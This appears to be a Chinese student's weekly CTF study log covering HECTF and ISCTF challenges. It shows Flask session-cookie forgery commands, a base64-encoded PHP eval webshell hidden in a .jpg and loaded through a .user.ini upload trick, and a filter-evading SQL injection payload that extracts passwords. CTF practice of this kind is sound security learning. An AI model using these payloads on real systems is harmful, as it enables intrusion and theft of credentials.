<a name="GL4o1"></a>
# 本周内容：
1.学习XSS<br />2.文件上传<br />3.开源情报<br />4.ISCTF
<a name="TPggj"></a>
# 成果展示：
<a name="iCc5Y"></a>
## 1.XSS-session伪造
HECTF第一题<br />第一个考点是session的伪造
```powershell
D:\User\Desktop\CTF工具\Web>python "D:\User\Desktop\CTF工具\Web\flask session.py" decode -c eyJrZXkiOiJ6eGsxaW5nIiwidXNlcm5hbWUiOiJqb2tlciJ9.ZVnpeg.YWC4Ez6niWas1UUk-bKfZ8AoY3s
b'{"key":"zxk1ing","username":"joker"}'
```
解密出来数据要改username，并且提供了key<br />使用工具：
```powershell
root@DESKTOP-V7HUR9H:/mnt/d/User/Desktop/CTF工具/Web/flask-session-cookie-manager-master# python3 flask_session_cookie_manager3.py encode -s 'zxk1ing' -t '{"key":"zxk1ing","username":"zxk1ing"}'
eyJrZXkiOiJ6eGsxaW5nIiwidXNlcm5hbWUiOiJqb2tlciJ9.ZVn1QQ.cPzqHJoqA23RcGlDdYZqmkJUmq0
```
传入服务器：<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1700394791951-fb6e5548-18de-4bbe-85bb-79bf46ebbc47.png#averageHue=%23aaa9a8&clientId=u07fb9345-9636-4&from=paste&height=805&id=udaca19d2&originHeight=1408&originWidth=2568&originalType=binary&ratio=1.75&rotation=0&showTitle=false&size=833829&status=done&style=none&taskId=u67b8521e-ae36-4187-8c9d-14cb1cad027&title=&width=1467.4285714285713)<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1700394824282-8637f084-e808-4706-98e8-38822836f618.png#averageHue=%23383330&clientId=u07fb9345-9636-4&from=paste&height=23&id=uc007f1b4&originHeight=40&originWidth=493&originalType=binary&ratio=1.75&rotation=0&showTitle=false&size=4552&status=done&style=none&taskId=u4500c461-1384-4492-a011-89d2cd477da&title=&width=281.7142857142857)<br />发现可能存在漏洞的接口<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1700395367809-e21f1e1d-1dd5-4c93-a1e3-51550b1671be.png#averageHue=%23b4b4b4&clientId=u07fb9345-9636-4&from=paste&height=418&id=u29d3e56d&originHeight=1408&originWidth=2568&originalType=binary&ratio=1.75&rotation=0&showTitle=false&size=198319&status=done&style=none&taskId=ua3560b6e-efb3-415a-8787-066852e6f01&title=&width=762)<br />可以用data伪协议触发alert，那么就可以用file伪协议看看<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1700395072136-4b09de5a-b165-456f-b61f-a432cbc4430c.png#averageHue=%23e9dfa1&clientId=u07fb9345-9636-4&from=paste&height=97&id=ud6089643&originHeight=169&originWidth=1195&originalType=binary&ratio=1.75&rotation=0&showTitle=false&size=37702&status=done&style=none&taskId=u04b6bf5e-b7be-4995-80a9-ca7fa58dc09&title=&width=682.8571428571429)
<a name="vWpgq"></a>
## 2.文件上传
[ez_ini](https://isctf2023.mcsog.top/challenges#ez_ini-117)<br />.htaccess是伪静态环境配置文件，用于lamp。 .user.ini是lnmp文件，里面放的是网站的文件夹路径地址。目的是防止跨目录访问和文件跨目录读取. 配置 放在根目录 .user.ini<br />两个PHP方法：

1. auto_prepend_file:在页面顶部加载文件
2. auto_append_file:在页面底部加载文件

![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1700749263868-fca1ed9a-1949-489a-8fbe-485455e11598.png#averageHue=%23f3f2f2&clientId=u5744c4e2-fb6f-4&from=paste&height=173&id=u7040cd57&originHeight=173&originWidth=1144&originalType=binary&ratio=1&rotation=0&showTitle=false&size=17993&status=done&style=none&taskId=u843adece-38cd-40fe-98a2-1981a4e750c&title=&width=1144)<br />1.jpg:
```php
PD9waHAgZXZhbCgkX1BPU1RbYV0pOw==
// <?php eval($_POST[a]);
```
![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1700749389547-7c03e015-97e3-4092-8984-f32ae4871156.png#averageHue=%23f8f8f7&clientId=u5744c4e2-fb6f-4&from=paste&height=1049&id=ueebe1ef1&originHeight=1049&originWidth=1560&originalType=binary&ratio=1&rotation=0&showTitle=false&size=85560&status=done&style=none&taskId=uf2b83ea1-124b-4924-9462-f2732d9ae89&title=&width=1560)
<a name="QLu4r"></a>
## 3.sql注入
![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1700722976905-4478281e-5d7a-45f1-b1fd-1e0a593eddb1.png#averageHue=%2333414c&clientId=u37a63554-cafa-4&from=paste&height=377&id=u416dfaea&originHeight=566&originWidth=483&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=348678&status=done&style=none&taskId=u56ee7e5f-6d9d-4cf8-b6ba-ef7235cfbe9&title=&width=322)<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1700722990807-21b59899-d122-434c-bf5d-b07bd46ac32a.png#averageHue=%23385449&clientId=u37a63554-cafa-4&from=paste&height=494&id=uaa108e18&originHeight=741&originWidth=588&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=597693&status=done&style=none&taskId=ufd10ba07-3050-4003-9679-4bef43b4cdc&title=&width=392)sql注入<br />原语句：'and 1 union select password from users#![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1700989397582-ea06148c-c9ce-42ef-bab6-c2ee7d58a8c5.png#averageHue=%233c5552&clientId=u4010c1f6-d909-4&from=paste&height=599&id=u10990e7f&originHeight=898&originWidth=756&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=938594&status=done&style=none&taskId=u62fedb12-8fcf-4729-b9a9-40168f56f07&title=&width=504)<br />发现过滤<br />payload:<br />'anandd/**/1/**/uniunionon/**/selselectect/**/passwoorrd/**/from/**/users/**/limit/**/2,3#![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1700989371483-b856efee-6ef7-4279-b610-1716d4592a35.png#averageHue=%23385859&clientId=u4010c1f6-d909-4&from=paste&height=491&id=u6c1229e6&originHeight=736&originWidth=583&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=560483&status=done&style=none&taskId=u3bbd4a97-7bdd-40e4-909e-df89a0448a8&title=&width=388.6666666666667)
